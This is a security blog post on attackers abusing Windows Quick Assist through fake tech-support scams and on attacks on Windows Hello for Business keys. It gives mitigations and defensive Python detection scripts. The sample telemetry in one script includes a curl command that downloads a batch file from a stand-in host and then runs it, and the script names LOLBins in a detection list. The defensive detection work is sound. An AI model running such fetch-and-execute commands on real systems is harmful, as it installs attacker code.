Built-in Threats: How Cybercriminals Are Turning Microsoft Tools Into Attack Vectors
Cybercriminals are increasingly turning to the very tools enterprises trust to keep them productive and secure. Over the past six months, Ontinue’s Advanced Threat Operations (ATO) team has seen a spike in attacks that abuse built-in Microsoft Windows tools—especially Quick Assist and Windows Hello—to stealthily bypass defenses and infiltrate environments.
These attacks serve as a wake-up call: convenience can no longer outweigh security.
Quick Assist: When “Helpful” Becomes Harmful
Quick Assist is a legitimate Microsoft feature built into Windows that lets a helper view another person's desktop and, once that person clicks Allow, take full control of it. The session is brokered by Microsoft's own service over outbound HTTPS, so it needs no inbound firewall rule or third-party remote-management tool and looks like sanctioned support traffic. In the hands of a threat actor, that is exactly what makes it a powerful weapon.
Here’s how the attack chain often unfolds:
- Email Bombing – Attackers subscribe the victim's address to hundreds of newsletters or flood their phone with messages, burying legitimate mail and manufacturing the confusion and urgency that make an unsolicited offer of help welcome.
- Fake Tech Support – The attacker then calls posing as IT or Microsoft, or the victim is steered to a spoofed "support" site and calls the number shown there; either way the caller offers to fix the mail problem.
- Quick Assist Abuse – The "technician" has the victim open Quick Assist, enter the security code the attacker generated, and click Allow when control is requested. No vulnerability is exploited: the user hands over an interactive session in a tool Microsoft signed and shipped.
From there, attackers can:
- Install malware and backdoors
- Maintain persistence
- Execute commands or install secondary payloads
- Steal data and credentials
- Disable security tools or even deploy ransomware
Mitigation Tips:
- Remove Quick Assist wherever it is not needed. There is no dedicated Group Policy switch for it; uninstall it with Remove-WindowsCapability on builds where it ships as a Windows capability or Remove-AppxPackage where it is a Store app, or push the removal through Intune. Where the help desk needs it, allow-list QuickAssist.exe on their machines only, using AppLocker or WDAC.
- Monitor process-creation telemetry (Security event 4688 or Sysmon event 1) for QuickAssist.exe, and treat a launch that is followed by curl.exe, cmd.exe, PowerShell or msiexec.exe in the same user session as an incident rather than a support call.
- Train users never to grant remote access they did not request: neither Microsoft nor the internal help desk cold-calls, and a support number must come from an official channel, never from a pop-up or an email.
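The monitoring tip is easier to act on with a concrete rule. The following is an added example, not code from Ontinue or Microsoft: it takes process-creation records (constructed here to mirror Sysmon Event ID 1 fields), finds every QuickAssist.exe launch, and attaches any curl, cmd, PowerShell or similar activity the same user started on the same host within the next 30 minutes. The LOLBin list, the allowed-host set, the sample paths and the time window are assumptions to tune locally.

```python
"""
Correlate Quick Assist launches with follow-on living-off-the-land activity.

Added example, not tooling from Ontinue or Microsoft.  The records below are
constructed to mimic Sysmon Event ID 1 (process creation) fields; they are
not real telemetry.  LOLBINS, ALLOWED_HOSTS and WINDOW are tuning assumptions.
"""
from datetime import datetime, timedelta

# Signed Windows binaries a hands-on-keyboard intruder typically reaches for
# once they control the desktop (assumption: tune to your estate).
LOLBINS = {"curl.exe", "bitsadmin.exe", "certutil.exe", "msiexec.exe",
           "powershell.exe", "cmd.exe", "rundll32.exe", "mshta.exe"}

# Hosts where Quick Assist is sanctioned, e.g. the help desk's own workstations.
ALLOWED_HOSTS = {"HELPDESK-01"}

# How long after the Quick Assist launch follow-on activity is attributed to it.
WINDOW = timedelta(minutes=30)

# Constructed sample telemetry (Sysmon Event ID 1 field names).  The WindowsApps
# path is illustrative; the logic keys on the executable name only.
QA = (r"C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_2.0.30.0"
      r"_x64__8wekyb3d8bbwe\QuickAssist.exe")
SAMPLE_EVENTS = [
    {"UtcTime": "2024-11-05 14:02:11", "Computer": "WS-1042", "User": r"CORP\alice",
     "Image": QA, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"QuickAssist.exe"'},
    {"UtcTime": "2024-11-05 14:04:30", "Computer": "WS-2001", "User": r"CORP\carol",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"UtcTime": "2024-11-05 14:05:10", "Computer": "WS-1042", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
    {"UtcTime": "2024-11-05 14:05:40", "Computer": "WS-1042", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -o C:\\Users\\alice\\Downloads\\fix.bat https://support.example/fix.bat"},
    {"UtcTime": "2024-11-05 14:06:02", "Computer": "WS-1042", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c C:\\Users\\alice\\Downloads\\fix.bat"},
    {"UtcTime": "2024-11-05 14:48:00", "Computer": "WS-1042", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"UtcTime": "2024-11-05 15:10:05", "Computer": "HELPDESK-01", "User": r"CORP\bob",
     "Image": QA, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"QuickAssist.exe"'},
    {"UtcTime": "2024-11-05 15:12:40", "Computer": "HELPDESK-01", "User": r"CORP\bob",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "OUTLOOK.EXE"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def _severity(finding):
    if finding["followed_by"] and finding["unsanctioned_host"]:
        return "high"
    if finding["followed_by"] or finding["unsanctioned_host"]:
        return "medium"
    return "info"


def find_quick_assist_sessions(events, allowed_hosts=ALLOWED_HOSTS, window=WINDOW):
    """One finding per QuickAssist.exe launch, with any LOLBin activity that the
    same user started on the same host within `window` afterwards."""
    evs = sorted(events, key=lambda e: _ts(e["UtcTime"]))
    findings = []
    for i, e in enumerate(evs):
        if _basename(e["Image"]) != "quickassist.exe":
            continue
        start = _ts(e["UtcTime"])
        finding = {
            "host": e["Computer"], "user": e["User"], "start": e["UtcTime"],
            "unsanctioned_host": e["Computer"] not in allowed_hosts,
            "followed_by": [],
        }
        for f in evs[i + 1:]:
            if _ts(f["UtcTime"]) - start > window:
                break  # events are sorted, so nothing later is inside the window
            if (f["Computer"], f["User"]) != (e["Computer"], e["User"]):
                continue  # same host and same user only
            if _basename(f["Image"]) in LOLBINS:
                finding["followed_by"].append(
                    (f["UtcTime"], _basename(f["Image"]), f["CommandLine"]))
        finding["severity"] = _severity(finding)
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_quick_assist_sessions(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['host']} {f['user']} Quick Assist at {f['start']}")
        for when, exe, cmdline in f["followed_by"]:
            print(f"    {when}  {exe}: {cmdline}")
```

Run it as a script to print the two findings; in production the input list would be the result of a SIEM query rather than the inline sample. The design choice that matters is correlating on host, user and time rather than on QuickAssist.exe's child processes: the scammer drives the desktop through the victim's existing session, so the commands are spawned by explorer.exe or cmd.exe, not by Quick Assist itself.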
Windows Hello: Passwordless, Not Riskless
Windows Hello, and especially its enterprise variant Windows Hello for Business (WHfB), authenticates with an asymmetric key bound to the device and unlocked locally by a PIN or biometric. The private key never leaves the device and there is no shared secret to type into a fake login page, which is what makes it phishing-resistant. Robust as that is, the credential itself and the process that issues it are now being targeted.
Two key threat scenarios are emerging:
- Rogue Device Enrollment
- Where any user may register devices and enrollment is not gated on a compliant or managed device, an attacker holding a user's credentials can register a device of their own and complete WHfB provisioning on it. WHfB provisioning requires MFA, so in practice this means a phished password plus a stolen MFA session. The resulting key is a durable credential tied to the attacker's device: it survives a password reset and satisfies MFA on every later sign-in.
- Authentication Key Abuse
- WHfB private keys are meant to live in the Trusted Platform Module (TPM), where they are non-exportable. If policy lets enrollment fall back to a software-protected key on an endpoint without a usable TPM, the key sits in the user's profile under DPAPI, and an attacker with local administrator rights can extract it and authenticate as the user from anywhere. That satisfies MFA, because WHfB itself counts as the second factor. Even a TPM-bound key can be used by an attacker who is already running code on the endpoint while the user's session is unlocked.
Security Recommendations:
- Monitor WHfB enrollments in both directories: in Entra ID, the audit log's "Register device" and "Add registered owner to device" activities; in Active Directory, Security event 5136 writes to the msDS-KeyCredentialLink attribute, which is where the user's public key lands in key-trust and certificate-trust deployments and where an attacker with write access to an account can also plant a key of their own.
- Gate enrollment with Conditional Access: require a compliant or hybrid-joined device and restrict which users may register devices at all.
- Require TPM 2.0 and set the WHfB policy "Use a hardware security device" so that provisioning fails rather than falling back to a software key; enable Credential Guard so the Kerberos and NTLM secrets derived after sign-in are out of reach of the same local attacker.
- Revoke compromised keys and devices promptly: remove the device from Entra ID and clear the user's key credentials as well as resetting the password, since a password reset on its own does not invalidate WHfB keys.
- Regularly audit sign-in activity, paying attention to sign-ins whose authentication method is Windows Hello for Business from a device the user is not known to own.
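To make the first and fourth recommendations concrete on the Active Directory side, here is an added example (not Ontinue's or Microsoft's tooling) that audits msDS-KeyCredentialLink changes. It reads Security event 5136 records, constructed here as dictionaries with OperationType already resolved to text, and flags any key written by an account other than the provisioning service, any burst of keys added to one object, and, for the timeline, every revocation. The writer allow-list, the account names and the burst threshold are assumptions.

```python
"""
Audit writes to msDS-KeyCredentialLink, the Active Directory attribute that
stores an account's Windows Hello for Business public keys.

Added example, not tooling from Ontinue or Microsoft.  The records are
constructed to mirror Security event 5136 (directory service object modified)
with OperationType already resolved to text; they are not real log data.
EXPECTED_WRITERS and the burst threshold are assumptions to tune locally.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts that legitimately publish keys: the Entra Connect sync account in
# hybrid key-trust deployments, the AD FS service account in certificate-trust
# deployments.  Assumed names; substitute your own.
EXPECTED_WRITERS = {"MSOL_1a2b3c4d5e6f", "svc-adfs"}

# More than this many keys added to one object inside BURST_WINDOW is worth a
# look even when the writer is legitimate (assumption).
BURST_THRESHOLD = 2
BURST_WINDOW = timedelta(hours=24)

ATTR = "msds-keycredentiallink"

# Constructed sample events (Security event 5136 field names).
SAMPLE_5136 = [
    {"TimeCreated": "2024-11-04 08:00:00", "SubjectUserName": "MSOL_1a2b3c4d5e6f",
     "ObjectDN": "CN=Alice,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"TimeCreated": "2024-11-04 09:15:00", "SubjectUserName": "helpdesk-bob",
     "ObjectDN": "CN=Alice,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": "Value Added"},
    {"TimeCreated": "2024-11-05 22:41:09", "SubjectUserName": "helpdesk-bob",
     "ObjectDN": "CN=Alice,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"TimeCreated": "2024-11-06 09:00:00", "SubjectUserName": "MSOL_1a2b3c4d5e6f",
     "ObjectDN": "CN=Dave,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"TimeCreated": "2024-11-06 09:20:00", "SubjectUserName": "MSOL_1a2b3c4d5e6f",
     "ObjectDN": "CN=Dave,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"TimeCreated": "2024-11-06 09:45:00", "SubjectUserName": "MSOL_1a2b3c4d5e6f",
     "ObjectDN": "CN=Dave,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"TimeCreated": "2024-11-06 11:30:00", "SubjectUserName": "svc-adfs",
     "ObjectDN": "CN=Alice,OU=Users,DC=corp,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Deleted"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def audit_key_credential_writes(events, expected_writers=EXPECTED_WRITERS,
                                burst_threshold=BURST_THRESHOLD,
                                burst_window=BURST_WINDOW):
    """Return findings for every msDS-KeyCredentialLink change, in time order."""
    findings = []
    adds = defaultdict(list)  # ObjectDN -> times at which a key value was added
    for e in sorted(events, key=lambda e: _ts(e["TimeCreated"])):
        if e["AttributeLDAPDisplayName"].lower() != ATTR:
            continue  # other attribute changes are not our concern here
        when, who, target = _ts(e["TimeCreated"]), e["SubjectUserName"], e["ObjectDN"]
        base = {"time": e["TimeCreated"], "writer": who, "target": target}
        if e["OperationType"] == "Value Deleted":
            # Revocation is expected after a compromise; keep it for the timeline.
            findings.append({**base, "severity": "info",
                             "reason": "key credential removed"})
            continue
        if who not in expected_writers:
            # Only the provisioning service should publish keys; anyone else
            # writing here is a rogue enrollment path or a planted key.
            findings.append({**base, "severity": "high",
                             "reason": "key credential added by unexpected account"})
        adds[target].append(when)
        recent = [t for t in adds[target] if when - t <= burst_window]
        if len(recent) > burst_threshold:
            findings.append({**base, "severity": "medium",
                             "reason": f"{len(recent)} key credentials added within {burst_window}"})
    return findings


if __name__ == "__main__":
    for f in audit_key_credential_writes(SAMPLE_5136):
        print(f"[{f['severity'].upper()}] {f['time']} {f['writer']} -> {f['target']}: {f['reason']}")
```

The same shape of rule applies to the Entra ID audit log, with "Register device" in place of the attribute write and the initiating user in place of SubjectUserName. Capturing 5136 for this attribute requires a SACL on the user objects that audits Write Property, so confirm the events actually arrive before relying on the rule.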
Rethinking Trust in Trusted Tools
The growing abuse of tools like Quick Assist and Windows Hello shows that attackers aren’t always looking for exotic exploits—they’re often exploiting convenience.
It’s time for security teams to take a hard look at the tools and applications considered “safe by default.” Because when convenience becomes a blind spot, it’s only a matter of time before it’s weaponized.
Learn more about these tactics and other rising threats in Ontinue’s latest 2H 2024 Threat Intelligence Report from our Advanced Threat Operations team.